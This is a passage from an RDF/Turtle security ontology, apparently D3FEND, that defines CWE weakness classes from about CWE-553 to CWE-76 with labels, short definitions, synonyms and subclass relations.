; rdfs:label "Command Shell in Externally Accessible Directory" ; d3f:cwe-id "CWE-553" ; d3f:definition "A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-554 a owl:Class ; rdfs:label "ASP.NET Misconfiguration: Not Using Input Validation Framework" ; d3f:cwe-id "CWE-554" ; d3f:definition "The ASP.NET application does not use an input validation framework." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-555 a owl:Class ; rdfs:label "J2EE Misconfiguration: Plaintext Password in Configuration File" ; d3f:cwe-id "CWE-555" ; d3f:definition "The J2EE application stores a plaintext password in a configuration file." ; rdfs:subClassOf d3f:CWE-260 . d3f:CWE-556 a owl:Class ; rdfs:label "ASP.NET Misconfiguration: Use of Identity Impersonation" ; d3f:cwe-id "CWE-556" ; d3f:definition "Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges." ; rdfs:subClassOf d3f:CWE-266 . d3f:CWE-558 a owl:Class ; rdfs:label "Use of getlogin() in Multithreaded Application" ; d3f:cwe-id "CWE-558" ; d3f:definition "The product uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values." ; rdfs:subClassOf d3f:CWE-663 . d3f:CWE-56 a owl:Class ; rdfs:label "Path Equivalence: 'filedir*' (Wildcard)" ; d3f:cwe-id "CWE-56" ; d3f:definition "The product accepts path input in the form of asterisk wildcard ('filedir*') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-155, d3f:CWE-41 . d3f:CWE-560 a owl:Class ; rdfs:label "Use of umask() with chmod-style Argument" ; d3f:cwe-id "CWE-560" ; d3f:definition "The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod()." ; rdfs:subClassOf d3f:CWE-687 . d3f:CWE-561 a owl:Class ; rdfs:label "Dead Code" ; d3f:cwe-id "CWE-561" ; d3f:definition "The product contains dead code, which can never be executed." ; rdfs:subClassOf d3f:CWE-1164 . d3f:CWE-562 a owl:Class ; rdfs:label "Return of Stack Variable Address" ; d3f:cwe-id "CWE-562" ; d3f:definition "A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash." ; rdfs:subClassOf d3f:CWE-758 . d3f:CWE-563 a owl:Class ; rdfs:label "Assignment to Variable without Use" ; d3f:cwe-id "CWE-563" ; d3f:definition "The variable's value is assigned but never used, making it a dead store." ; d3f:synonym "Unused Variable" ; rdfs:subClassOf d3f:CWE-1164 . d3f:CWE-564 a owl:Class ; rdfs:label "SQL Injection: Hibernate" ; d3f:cwe-id "CWE-564" ; d3f:definition "Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands." ; rdfs:subClassOf d3f:CWE-89 . d3f:CWE-566 a owl:Class ; rdfs:label "Authorization Bypass Through User-Controlled SQL Primary Key" ; d3f:cwe-id "CWE-566" ; d3f:definition "The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor." ; rdfs:subClassOf d3f:CWE-639 . d3f:CWE-567 a owl:Class ; rdfs:label "Unsynchronized Access to Shared Data in a Multithreaded Context" ; d3f:cwe-id "CWE-567" ; d3f:definition "The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes." ; rdfs:subClassOf d3f:CWE-820 . d3f:CWE-568 a owl:Class ; rdfs:label "finalize() Method Without super.finalize()" ; d3f:cwe-id "CWE-568" ; d3f:definition "The product contains a finalize() method that does not call super.finalize()." ; rdfs:subClassOf d3f:CWE-459, d3f:CWE-573 . d3f:CWE-57 a owl:Class ; rdfs:label "Path Equivalence: 'fakedir/../realdir/filename'" ; d3f:cwe-id "CWE-57" ; d3f:definition "The product contains protection mechanisms to restrict access to 'realdir/filename', but it constructs pathnames using external input in the form of 'fakedir/../realdir/filename' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-570 a owl:Class ; rdfs:label "Expression is Always False" ; d3f:cwe-id "CWE-570" ; d3f:definition "The product contains an expression that will always evaluate to false." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-571 a owl:Class ; rdfs:label "Expression is Always True" ; d3f:cwe-id "CWE-571" ; d3f:definition "The product contains an expression that will always evaluate to true." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-572 a owl:Class ; rdfs:label "Call to Thread run() instead of start()" ; d3f:cwe-id "CWE-572" ; d3f:definition "The product calls a thread's run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee." ; rdfs:subClassOf d3f:CWE-821 . d3f:CWE-574 a owl:Class ; rdfs:label "EJB Bad Practices: Use of Synchronization Primitives" ; d3f:cwe-id "CWE-574" ; d3f:definition "The product violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives." ; rdfs:subClassOf d3f:CWE-695, d3f:CWE-821 . d3f:CWE-575 a owl:Class ; rdfs:label "EJB Bad Practices: Use of AWT Swing" ; d3f:cwe-id "CWE-575" ; d3f:definition "The product violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-576 a owl:Class ; rdfs:label "EJB Bad Practices: Use of Java I/O" ; d3f:cwe-id "CWE-576" ; d3f:definition "The product violates the Enterprise JavaBeans (EJB) specification by using the java.io package." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-577 a owl:Class ; rdfs:label "EJB Bad Practices: Use of Sockets" ; d3f:cwe-id "CWE-577" ; d3f:definition "The product violates the Enterprise JavaBeans (EJB) specification by using sockets." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-578 a owl:Class ; rdfs:label "EJB Bad Practices: Use of Class Loader" ; d3f:cwe-id "CWE-578" ; d3f:definition "The product violates the Enterprise JavaBeans (EJB) specification by using the class loader." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-579 a owl:Class ; rdfs:label "J2EE Bad Practices: Non-serializable Object Stored in Session" ; d3f:cwe-id "CWE-579" ; d3f:definition "The product stores a non-serializable object as an HttpSession attribute, which can hurt reliability." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-58 a owl:Class ; rdfs:label "Path Equivalence: Windows 8.3 Filename" ; d3f:cwe-id "CWE-58" ; d3f:definition "The product contains a protection mechanism that restricts access to a long filename on a Windows operating system, but it does not properly restrict access to the equivalent short \"8.3\" filename." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-580 a owl:Class ; rdfs:label "clone() Method Without super.clone()" ; d3f:cwe-id "CWE-580" ; d3f:definition "The product contains a clone() method that does not call super.clone() to obtain the new object." ; rdfs:subClassOf d3f:CWE-573, d3f:CWE-664 . d3f:CWE-581 a owl:Class ; rdfs:label "Object Model Violation: Just One of Equals and Hashcode Defined" ; d3f:cwe-id "CWE-581" ; d3f:definition "The product does not maintain equal hashcodes for equal objects." ; rdfs:subClassOf d3f:CWE-573, d3f:CWE-697 . d3f:CWE-582 a owl:Class ; rdfs:label "Array Declared Public, Final, and Static" ; d3f:cwe-id "CWE-582" ; d3f:definition "The product declares an array public, final, and static, which is not sufficient to prevent the array's contents from being modified." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-583 a owl:Class ; rdfs:label "finalize() Method Declared Public" ; d3f:cwe-id "CWE-583" ; d3f:definition "The product violates secure coding principles for mobile code by declaring a finalize() method public." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-584 a owl:Class ; rdfs:label "Return Inside Finally Block" ; d3f:cwe-id "CWE-584" ; d3f:definition "The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded." ; rdfs:subClassOf d3f:CWE-705 . d3f:CWE-585 a owl:Class ; rdfs:label "Empty Synchronized Block" ; d3f:cwe-id "CWE-585" ; d3f:definition "The product contains an empty synchronized block." ; rdfs:subClassOf d3f:CWE-1071 . d3f:CWE-586 a owl:Class ; rdfs:label "Explicit Call to Finalize()" ; d3f:cwe-id "CWE-586" ; d3f:definition "The product makes an explicit call to the finalize() method from outside the finalizer." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-587 a owl:Class ; rdfs:label "Assignment of a Fixed Address to a Pointer" ; d3f:cwe-id "CWE-587" ; d3f:definition "The product sets a pointer to a specific address other than NULL or 0." ; rdfs:subClassOf d3f:CWE-344, d3f:CWE-758 . d3f:CWE-588 a owl:Class ; rdfs:label "Attempt to Access Child of a Non-structure Pointer" ; d3f:cwe-id "CWE-588" ; d3f:definition "Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption." ; rdfs:subClassOf d3f:CWE-704, d3f:CWE-758 . d3f:CWE-589 a owl:Class ; rdfs:label "Call to Non-ubiquitous API" ; d3f:cwe-id "CWE-589" ; d3f:definition "The product uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences." ; rdfs:subClassOf d3f:CWE-474 . d3f:CWE-590 a owl:Class, owl:NamedIndividual ; rdfs:label "Free of Memory not on the Heap" ; d3f:cwe-id "CWE-590" ; d3f:definition "The product calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc()." ; d3f:weakness-of d3f:MemoryFreeFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:MemoryFreeFunction ], d3f:CWE-762 . d3f:CWE-591 a owl:Class ; rdfs:label "Sensitive Data Storage in Improperly Locked Memory" ; d3f:cwe-id "CWE-591" ; d3f:definition "The product stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors." ; rdfs:subClassOf d3f:CWE-413 . d3f:CWE-593 a owl:Class ; rdfs:label "Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created" ; d3f:cwe-id "CWE-593" ; d3f:definition "The product modifies the SSL context after connection creation has begun." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-666 . d3f:CWE-594 a owl:Class ; rdfs:label "J2EE Framework: Saving Unserializable Objects to Disk" ; d3f:cwe-id "CWE-594" ; d3f:definition "When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully." ; rdfs:subClassOf d3f:CWE-1076, d3f:CWE-710 . d3f:CWE-597 a owl:Class ; rdfs:label "Use of Wrong Operator in String Comparison" ; d3f:cwe-id "CWE-597" ; d3f:definition "The product uses the wrong operator when comparing a string, such as using \"==\" when the .equals() method should be used instead." ; rdfs:subClassOf d3f:CWE-480, d3f:CWE-595 . d3f:CWE-598 a owl:Class ; rdfs:label "Use of GET Request Method With Sensitive Query Strings" ; d3f:cwe-id "CWE-598" ; d3f:definition "The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request." ; rdfs:subClassOf d3f:CWE-201 . d3f:CWE-599 a owl:Class ; rdfs:label "Missing Validation of OpenSSL Certificate" ; d3f:cwe-id "CWE-599" ; d3f:definition "The product uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements." ; rdfs:subClassOf d3f:CWE-295 . d3f:CWE-6 a owl:Class ; rdfs:label "J2EE Misconfiguration: Insufficient Session-ID Length" ; d3f:cwe-id "CWE-6" ; d3f:definition "The J2EE application is configured to use an insufficient session ID length." ; rdfs:subClassOf d3f:CWE-334 . d3f:CWE-600 a owl:Class ; rdfs:label "Uncaught Exception in Servlet" ; d3f:cwe-id "CWE-600" ; d3f:definition "The Servlet does not catch all exceptions, which may reveal sensitive debugging information." ; d3f:synonym "Missing Catch Block" ; rdfs:subClassOf d3f:CWE-248 . d3f:CWE-601 a owl:Class ; rdfs:label "URL Redirection to Untrusted Site ('Open Redirect')" ; d3f:cwe-id "CWE-601" ; d3f:definition "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect." ; d3f:synonym "Cross-domain Redirect", "Cross-site Redirect", "Open Redirect", "Unvalidated Redirect" ; rdfs:subClassOf d3f:CWE-610 . d3f:CWE-603 a owl:Class ; rdfs:label "Use of Client-Side Authentication" ; d3f:cwe-id "CWE-603" ; d3f:definition "A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check." ; rdfs:subClassOf d3f:CWE-1390, d3f:CWE-602 . d3f:CWE-605 a owl:Class ; rdfs:label "Multiple Binds to the Same Port" ; d3f:cwe-id "CWE-605" ; d3f:definition "When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed." ; rdfs:subClassOf d3f:CWE-666, d3f:CWE-675 . d3f:CWE-606 a owl:Class ; rdfs:label "Unchecked Input for Loop Condition" ; d3f:cwe-id "CWE-606" ; d3f:definition "The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping." ; rdfs:subClassOf d3f:CWE-1284 . d3f:CWE-607 a owl:Class ; rdfs:label "Public Static Final Field References Mutable Object" ; d3f:cwe-id "CWE-607" ; d3f:definition "A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package." ; rdfs:subClassOf d3f:CWE-471 . d3f:CWE-608 a owl:Class ; rdfs:label "Struts: Non-private Field in ActionForm Class" ; d3f:cwe-id "CWE-608" ; d3f:definition "An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-609 a owl:Class ; rdfs:label "Double-Checked Locking" ; d3f:cwe-id "CWE-609" ; d3f:definition "The product uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-61 a owl:Class ; rdfs:label "UNIX Symbolic Link (Symlink) Following" ; d3f:cwe-id "CWE-61" ; d3f:definition "The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files." ; d3f:synonym "Symlink following", "symlink vulnerability" ; rdfs:subClassOf d3f:CWE-59 . d3f:CWE-611 a owl:Class, owl:NamedIndividual ; rdfs:label "Improper Restriction of XML External Entity Reference" ; d3f:cwe-id "CWE-611" ; d3f:definition "The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output." ; d3f:synonym "XXE" ; d3f:weakness-of d3f:ExternalContentInclusionFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:ExternalContentInclusionFunction ], d3f:CWE-610 . d3f:CWE-612 a owl:Class ; rdfs:label "Improper Authorization of Index Containing Sensitive Information" ; d3f:cwe-id "CWE-612" ; d3f:definition "The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information." ; rdfs:subClassOf d3f:CWE-1230 . d3f:CWE-613 a owl:Class ; rdfs:label "Insufficient Session Expiration" ; d3f:cwe-id "CWE-613" ; d3f:definition "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\"" ; rdfs:subClassOf d3f:CWE-672 . d3f:CWE-614 a owl:Class ; rdfs:label "Sensitive Cookie in HTTPS Session Without 'Secure' Attribute" ; d3f:cwe-id "CWE-614" ; d3f:definition "The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session." ; rdfs:subClassOf d3f:CWE-319 . d3f:CWE-615 a owl:Class ; rdfs:label "Inclusion of Sensitive Information in Source Code Comments" ; d3f:cwe-id "CWE-615" ; d3f:definition "While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc." ; rdfs:subClassOf d3f:CWE-540 . d3f:CWE-616 a owl:Class ; rdfs:label "Incomplete Identification of Uploaded File Variables (PHP)" ; d3f:cwe-id "CWE-616" ; d3f:definition "The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-617 a owl:Class ; rdfs:label "Reachable Assertion" ; d3f:cwe-id "CWE-617" ; d3f:definition "The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary." ; d3f:synonym "assertion failure" ; rdfs:subClassOf d3f:CWE-670 . d3f:CWE-618 a owl:Class ; rdfs:label "Exposed Unsafe ActiveX Method" ; d3f:cwe-id "CWE-618" ; d3f:definition "An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser's security model (e.g. the zone or domain)." ; rdfs:subClassOf d3f:CWE-749 . d3f:CWE-619 a owl:Class ; rdfs:label "Dangling Database Cursor ('Cursor Injection')" ; d3f:cwe-id "CWE-619" ; d3f:definition "If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \"dangling.\"" ; rdfs:subClassOf d3f:CWE-402 . d3f:CWE-62 a owl:Class ; rdfs:label "UNIX Hard Link" ; d3f:cwe-id "CWE-62" ; d3f:definition "The product, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files." ; rdfs:subClassOf d3f:CWE-59 . d3f:CWE-620 a owl:Class ; rdfs:label "Unverified Password Change" ; d3f:cwe-id "CWE-620" ; d3f:definition "When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-621 a owl:Class ; rdfs:label "Variable Extraction Error" ; d3f:cwe-id "CWE-621" ; d3f:definition "The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables." ; d3f:synonym "Variable overwrite" ; rdfs:subClassOf d3f:CWE-914 . d3f:CWE-622 a owl:Class ; rdfs:label "Improper Validation of Function Hook Arguments" ; d3f:cwe-id "CWE-622" ; d3f:definition "The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities." ; rdfs:subClassOf d3f:CWE-20 . d3f:CWE-623 a owl:Class ; rdfs:label "Unsafe ActiveX Control Marked Safe For Scripting" ; d3f:cwe-id "CWE-623" ; d3f:definition "An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting." ; rdfs:subClassOf d3f:CWE-267 . d3f:CWE-624 a owl:Class ; rdfs:label "Executable Regular Expression Error" ; d3f:cwe-id "CWE-624" ; d3f:definition "The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers." ; rdfs:subClassOf d3f:CWE-77 . d3f:CWE-626 a owl:Class ; rdfs:label "Null Byte Interaction Error (Poison Null Byte)" ; d3f:cwe-id "CWE-626" ; d3f:definition "The product does not properly handle null bytes or NUL characters when passing data between different representations or components." ; rdfs:subClassOf d3f:CWE-147, d3f:CWE-436 . d3f:CWE-627 a owl:Class ; rdfs:label "Dynamic Variable Evaluation" ; d3f:cwe-id "CWE-627" ; d3f:definition "In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions." ; d3f:synonym "Dynamic evaluation" ; rdfs:subClassOf d3f:CWE-914 . d3f:CWE-637 a owl:Class ; rdfs:label "Unnecessary Complexity in Protection Mechanism (Not Using 'Economy of Mechanism')" ; d3f:cwe-id "CWE-637" ; d3f:definition "The product uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used." ; d3f:synonym "Unnecessary Complexity" ; rdfs:subClassOf d3f:CWE-657 . d3f:CWE-64 a owl:Class ; rdfs:label "Windows Shortcut Following (.LNK)" ; d3f:cwe-id "CWE-64" ; d3f:definition "The product, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files." ; d3f:synonym "Windows symbolic link following", "symlink" ; rdfs:subClassOf d3f:CWE-59 . d3f:CWE-640 a owl:Class ; rdfs:label "Weak Password Recovery Mechanism for Forgotten Password" ; d3f:cwe-id "CWE-640" ; d3f:definition "The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak." ; rdfs:subClassOf d3f:CWE-1390 . d3f:CWE-641 a owl:Class ; rdfs:label "Improper Restriction of Names for Files and Other Resources" ; d3f:cwe-id "CWE-641" ; d3f:definition "The product constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name." ; rdfs:subClassOf d3f:CWE-99 . d3f:CWE-643 a owl:Class ; rdfs:label "Improper Neutralization of Data within XPath Expressions ('XPath Injection')" ; d3f:cwe-id "CWE-643" ; d3f:definition "The product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query." ; rdfs:subClassOf d3f:CWE-91, d3f:CWE-943 . d3f:CWE-644 a owl:Class ; rdfs:label "Improper Neutralization of HTTP Headers for Scripting Syntax" ; d3f:cwe-id "CWE-644" ; d3f:definition "The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash." ; rdfs:subClassOf d3f:CWE-116 . d3f:CWE-645 a owl:Class ; rdfs:label "Overly Restrictive Account Lockout Mechanism" ; d3f:cwe-id "CWE-645" ; d3f:definition "The product contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out." ; rdfs:subClassOf d3f:CWE-287 . d3f:CWE-646 a owl:Class ; rdfs:label "Reliance on File Name or Extension of Externally-Supplied File" ; d3f:cwe-id "CWE-646" ; d3f:definition "The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-647 a owl:Class ; rdfs:label "Use of Non-Canonical URL Paths for Authorization Decisions" ; d3f:cwe-id "CWE-647" ; d3f:definition "The product defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization." ; rdfs:subClassOf d3f:CWE-863 . d3f:CWE-648 a owl:Class ; rdfs:label "Incorrect Use of Privileged APIs" ; d3f:cwe-id "CWE-648" ; d3f:definition "The product does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly." ; rdfs:subClassOf d3f:CWE-269 . d3f:CWE-649 a owl:Class ; rdfs:label "Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking" ; d3f:cwe-id "CWE-649" ; d3f:definition "The product uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the product does not use integrity checks to detect if those inputs have been modified." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-65 a owl:Class ; rdfs:label "Windows Hard Link" ; d3f:cwe-id "CWE-65" ; d3f:definition "The product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files." ; rdfs:subClassOf d3f:CWE-59 . d3f:CWE-650 a owl:Class ; rdfs:label "Trusting HTTP Permission Methods on the Server Side" ; d3f:cwe-id "CWE-650" ; d3f:definition "The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state." ; rdfs:subClassOf d3f:CWE-436 . d3f:CWE-651 a owl:Class ; rdfs:label "Exposure of WSDL File Containing Sensitive Information" ; d3f:cwe-id "CWE-651" ; d3f:definition "The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return)." ; rdfs:subClassOf d3f:CWE-538 . d3f:CWE-652 a owl:Class ; rdfs:label "Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')" ; d3f:cwe-id "CWE-652" ; d3f:definition "The product uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query." ; rdfs:subClassOf d3f:CWE-91, d3f:CWE-943 . d3f:CWE-655 a owl:Class ; rdfs:label "Insufficient Psychological Acceptability" ; d3f:cwe-id "CWE-655" ; d3f:definition "The product has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose." ; rdfs:subClassOf d3f:CWE-657, d3f:CWE-693 . d3f:CWE-656 a owl:Class ; rdfs:label "Reliance on Security Through Obscurity" ; d3f:cwe-id "CWE-656" ; d3f:definition "The product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism." ; d3f:synonym "Never Assuming your secrets are safe" ; rdfs:subClassOf d3f:CWE-657, d3f:CWE-693 . d3f:CWE-67 a owl:Class ; rdfs:label "Improper Handling of Windows Device Names" ; d3f:cwe-id "CWE-67" ; d3f:definition "The product constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file." ; rdfs:subClassOf d3f:CWE-66 . d3f:CWE-680 a owl:Class ; rdfs:label "Integer Overflow to Buffer Overflow" ; d3f:cwe-id "CWE-680" ; d3f:definition "The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow." ; rdfs:subClassOf d3f:CWE-119, d3f:CWE-190 . d3f:CWE-683 a owl:Class ; rdfs:label "Function Call With Incorrect Order of Arguments" ; d3f:cwe-id "CWE-683" ; d3f:definition "The product calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses." ; rdfs:subClassOf d3f:CWE-628 . d3f:CWE-685 a owl:Class ; rdfs:label "Function Call With Incorrect Number of Arguments" ; d3f:cwe-id "CWE-685" ; d3f:definition "The product calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses." ; rdfs:subClassOf d3f:CWE-628 . d3f:CWE-686 a owl:Class ; rdfs:label "Function Call With Incorrect Argument Type" ; d3f:cwe-id "CWE-686" ; d3f:definition "The product calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses." ; rdfs:subClassOf d3f:CWE-628 . d3f:CWE-688 a owl:Class ; rdfs:label "Function Call With Incorrect Variable or Reference as Argument" ; d3f:cwe-id "CWE-688" ; d3f:definition "The product calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses." ; rdfs:subClassOf d3f:CWE-628 . d3f:CWE-689 a owl:Class ; rdfs:label "Permission Race Condition During Resource Copy" ; d3f:cwe-id "CWE-689" ; d3f:definition "The product, while copying or cloning a resource, does not set the resource's permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place." ; rdfs:subClassOf d3f:CWE-362 . d3f:CWE-69 a owl:Class ; rdfs:label "Improper Handling of Windows ::DATA Alternate Data Stream" ; d3f:cwe-id "CWE-69" ; d3f:definition "The product does not properly prevent access to, or detect usage of, alternate data streams (ADS)." ; rdfs:subClassOf d3f:CWE-66 . d3f:CWE-690 a owl:Class ; rdfs:label "Unchecked Return Value to NULL Pointer Dereference" ; d3f:cwe-id "CWE-690" ; d3f:definition "The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference." ; rdfs:subClassOf d3f:CWE-252, d3f:CWE-476 . d3f:CWE-692 a owl:Class ; rdfs:label "Incomplete Denylist to Cross-Site Scripting" ; d3f:cwe-id "CWE-692" ; d3f:definition "The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed." ; rdfs:subClassOf d3f:CWE-184, d3f:CWE-79 . d3f:CWE-698 a owl:Class ; rdfs:label "Execution After Redirect (EAR)" ; d3f:cwe-id "CWE-698" ; d3f:definition "The web application sends a redirect to another location, but instead of exiting, it executes additional code." ; d3f:synonym "Redirect Without Exit" ; rdfs:subClassOf d3f:CWE-670, d3f:CWE-705 . d3f:CWE-7 a owl:Class ; rdfs:label "J2EE Misconfiguration: Missing Custom Error Page" ; d3f:cwe-id "CWE-7" ; d3f:definition "The default error page of a web application should not display sensitive information about the product." ; rdfs:subClassOf d3f:CWE-756 . d3f:CWE-708 a owl:Class ; rdfs:label "Incorrect Ownership Assignment" ; d3f:cwe-id "CWE-708" ; d3f:definition "The product assigns an owner to a resource, but the owner is outside of the intended control sphere." ; rdfs:subClassOf d3f:CWE-282 . d3f:CWE-72 a owl:Class ; rdfs:label "Improper Handling of Apple HFS+ Alternate Data Stream Path" ; d3f:cwe-id "CWE-72" ; d3f:definition "The product does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system." ; rdfs:subClassOf d3f:CWE-66 . d3f:CWE-757 a owl:Class ; rdfs:label "Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')" ; d3f:cwe-id "CWE-757" ; d3f:definition "A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-759 a owl:Class ; rdfs:label "Use of a One-Way Hash without a Salt" ; d3f:cwe-id "CWE-759" ; d3f:definition "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input." ; rdfs:subClassOf d3f:CWE-916 . d3f:CWE-76 a owl:Class ; rdfs:label "Improper Neutralization of Equivalent Special Elements" ; d3f:cwe-id "CWE-76" ; d3f:definition "The product correctly neutralizes certain special elements, but it improperly 